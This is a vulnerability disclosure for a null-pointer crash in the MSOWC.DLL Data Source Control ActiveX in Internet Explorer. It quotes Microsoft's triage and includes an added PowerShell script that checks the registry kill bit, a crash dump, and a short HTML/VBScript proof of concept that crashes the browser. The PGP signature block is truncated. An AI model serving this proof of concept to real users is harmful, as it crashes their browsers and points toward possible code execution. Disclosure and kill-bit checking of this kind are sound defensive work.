-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----------------------------------------------------------------------------
Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
File: MSOWC.DLL
Ver.: 9.0.0.8966
ProgID: OWC.DataSourceControl.9
Descr.: Microsoft Office Data Source Control 9.0
Marked:  RegKey Safe for Script: False
         RegKey Safe for Init: False
         Implements IObjectSafety: True
         IDisp Safe: Safe for untrusted: caller
Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)
According to MSRC:
"In triaging this it appears that this control has already had a killbit
released as part of an OWC patch (MS08-017).
Also, kill-bitted by IE in
http://www.microsoft.com/technet/security/advisory/956391.mspx
Unless I am missing a detail here or if the killbit was unsuccessful,
the MSRC won't open a new case for this control."
and:
"From our assessment this looks to be a non-exploitable null pointer."
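Whether the kill bit MSRC refers to (MS08-017 / advisory 956391) is actually present on a given machine can be verified directly in the registry: IE refuses to instantiate a control whose CLSID has bit 0x400 set in the "Compatibility Flags" DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility. The following PowerShell script is an added example, not part of shinnai's advisory; it uses the CLSID from the PoC below and also reports which MSOWC.DLL version is registered, so it can be compared with the 9.0.0.8966 build the advisory was tested against. The Wow6432Node path is an assumption for 64-bit hosts and simply does not exist on the 32-bit XP system named in the advisory.

```powershell
# Added example (not from the advisory): check the IE kill bit for
# OWC.DataSourceControl.9 and report the registered MSOWC.DLL version.
$clsid   = '{0002E533-0000-0000-C000-000000000046}'   # CLSID used in the PoC
$killBit = 0x400                                        # "Compatibility Flags" kill-bit flag

# Native view plus the WOW64 view (assumed; absent on 32-bit Windows XP).
$paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

function Test-KillBit {
    param([string]$Path, [int]$Bit)
    # $null = key absent, $false = key present but bit clear, $true = kill bit set
    if (-not (Test-Path -Path $Path)) { return $null }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $Bit) -eq $Bit)
}

foreach ($p in $paths) {
    $state = Test-KillBit -Path $p -Bit $killBit
    if ($null -eq $state) {
        "$p : key absent (control not kill-bitted in this view)"
    } elseif ($state) {
        "$p : kill bit SET (0x400) - IE will not instantiate this control"
    } else {
        "$p : key present but kill bit NOT set - control is still loadable"
    }
}

# Which DLL is actually registered for the CLSID, and what version is it?
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
if (Test-Path -Path $inproc) {
    $dll = (Get-ItemProperty -Path $inproc).'(default)'
    if ($dll -and (Test-Path -Path $dll)) {
        $ver = (Get-Item -Path $dll).VersionInfo.FileVersion
        "Registered server: $dll (file version $ver; advisory tested 9.0.0.8966)"
    } else {
        "InprocServer32 points to '$dll', which is not present on disk"
    }
} else {
    "CLSID $clsid is not registered on this machine"
}
```

Run it from an elevated prompt if the key is ACL-restricted. A control that is kill-bitted in one registry view but registered and not kill-bitted in the other is the case the MSRC reply leaves open ("if the killbit was unsuccessful"), which is why both views are listed.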
This is a report of the crash:
Dump:
3AD28D0A . 8B40 50 MOV EAX,DWORD PTR DS:[EAX+50]; <== CRASH
Registers:
EAX 00000000
ECX 0292009C
EDX 0021FFF2
EBX 029200FC
ESP 0161D258
EBP 0161D284
ESI 0161D278
EDI 0161D25C
EIP 3AD28D0A MSOWC.3AD28D0A
Stack:
ESP ==> > 00000008
ESP+4 > 0292009C
ESP+8 > 3AD28CDA RETURN to MSOWC.3AD28CDA from MSOWC.3AD2A6C4
ESP+C > 01F09C64 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
So if someone finds a way to manipulate EAX, code execution is possible.
This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 8
- ------------------------------------------------------------------------------
<html><body>
<!-- OWC.DataSourceControl.9 (MSOWC.DLL 9.0.0.8966); IE refuses to load it when the kill bit is set -->
<object classid='clsid:0002E533-0000-0000-C000-000000000046' id='test'></object>
<script language='vbscript'>
' A 1024-character string reaches MOV EAX,DWORD PTR DS:[EAX+50] with EAX = 0 and crashes IE
test.DeleteRecordSourceIfUnused String(1024, "A")
</script>
</body></html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)

=gH6Q
-----END PGP SIGNATURE-----